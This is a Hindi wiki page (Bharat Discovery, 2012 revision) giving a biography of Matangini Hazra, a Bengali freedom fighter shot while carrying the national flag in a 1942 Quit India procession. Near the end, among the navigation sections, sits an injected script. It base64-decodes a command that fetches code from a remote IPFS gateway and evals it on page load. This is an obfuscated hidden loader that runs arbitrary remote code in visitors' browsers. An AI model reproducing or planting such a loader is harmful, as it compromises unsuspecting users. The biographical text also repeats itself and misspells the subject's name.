मातंगिनी हज़ारा

भारत डिस्कवरी प्रस्तुति
Revision as of 06:19, 27 November 2012 by रविन्द्र प्रसाद (talk | contribs) (''''मातंगिनी हज़ारा''' (जन्म- 19 अक्टूबर, 1870, [[पश्चिम बंग...' के साथ नया पन्ना बनाया)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

मातंगिनी हज़ारा (जन्म- 19 अक्टूबर, 1870, पश्चिम बंगाल; शहादत- 29 सितम्बर, 1942) भारत की स्वतंत्रता के लिए अपने प्राणों की आहुति देने वाली बंगाल की वीरांगनाओं में से थीं। भारतीय इतिहास में उनका नाम बड़े ही मान-सम्मान के साथ लिया जाता है। मातंगिनी हज़ारा विधवा स्त्री अवश्य थीं, किंतु अवसर आने पर उन्होंने अदस्य शौर्य और साहस का परिचय दिया था। 'भारत छोड़ो आन्दोलन' के तहत ही सशस्त्र अंग्रेज़ सेना ने आन्दोलनकारियों को रुकने के लिए कहा। मातंगिनी हज़ारा ने साहस का परिचय देते हुए राष्ट्रीय ध्‍वज को अपने हाथों में ले लिया और जुलूस में सबसे आगे आ गईं। इसी समय उन पर गोलियाँ दागी गईं और इस वीरांगना ने देश के लिए अपनी कुर्बानी दी।

देश की स्वंतत्रता के संघर्ष में अपने प्राणों की आहुति देने वाली बंगाल की वीरांगनाओं में मातिंगिती हाजरा का नाम बड़े सम्मान से लिया जाता है वह एक बेपढ़ी -लिखी बाल -विधवा थी। किंतु अवसर आने पर उसनें अदम्य शौर्य का परिचय दिया। मातिंगिनी का जन्म 1870 ई. में पश्चिमबंगाल के मिदनापुर जिले में हुआ था। उन दिनों लड़कियों को पढ़ाया नही जाता था इसलिए वह निरक्षर रह गई। पिता ने बहुत छोटी उम्र मे ही उसका विवाह साठ वर्ष के एक धनी वृद्ध के साथ कर दिया। मातिंगिनी 18 वर्ष की थी तभी वह विधवा हो गई और अपने पति के मकान के पास एक कुटिया बनाकर रहने लगी। 1930 के आंदोलन में जब उसके गांव के कुछ युवकों ने भाग लिया तो मातिंगिनी ने पहली बार स्वतंत्रता की चर्चा सुनी। 1932 में उसके गांव में एक जुलूस निकला उसमें कोई महिला नही थी यह देखकर मातिंगिनी जुलूस में सम्मिलित हो गई। यह उसके जीवन का एक नया अध्याय था फिर उसने नमक सत्याग्रह में भाग लिया। इसमें अनेक व्याक्ति गिरफ्तार हुए, पर उनकी वृद्धावस्था देखकर उसे छोड़ दिया गया। उस पर मौका मिलते ही उसनें तामलुक की कचहरी पर जो पुलिस के पहरे में थी ,चुपचाप जाकर तिरगां झड़ा फहरा दिया। अब तो उसे इतनी मार पड़ी कि मुंह से खून निकलने लगा। 1933 में गवर्नर को काला झड़ा दिखाने पर उसे 6 महीने की सजा भोगनी पड़ी। इसके बाद आया 1942 का भारत छोड़ों आंदोलन, 29 सितंबर ,1942 की बात है एक बड़ा जुलूस तामलुक की कचहरी और पुलिस लाइन पर कब्जा करने के लिए आगे बढ़ा। मातिंगिनी इसमें सबसें आगे रहना चाहती थी ,पर पुऱूषों के रहते एक महिला को संकट में ड़ालने के लिए तैयार नही हुए। ज्योंही जुलूस आगे बढ़ा ,सशस्त्र सेना ने बंदूके तान ली और लोंगों को रूक जाने का आदेश दिया इससे जुलूस में कुछ खलबली हुई , और लोग बिखरने लगे। ,ठीक इसी समय़ जुलूस के बीच से निकलकर मातिंगिनी सबसें आगे आ गई ,और उसने तिरंगा झड़ा अपने हाथ में ले लिया लोग उसकी ललकार सुनकर फिर सब एकत्र हो गए और सेना ने चेतावनी दी और फिर गोली चला दी। पहली गोली मातिंगिनी के पैर में लगी जब वह फिर भी आगे बढ़ती गई तो उसके हाथ को निशाना बनाया गया। लेकिन उसने झड़ा फिर भी नही छोड़ा इस पर तीसरी गोली उसके सीने पर मारी और इस तरह ओर अज्ञात नारी भारत माता के चरणों मे शहीद हो गई।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः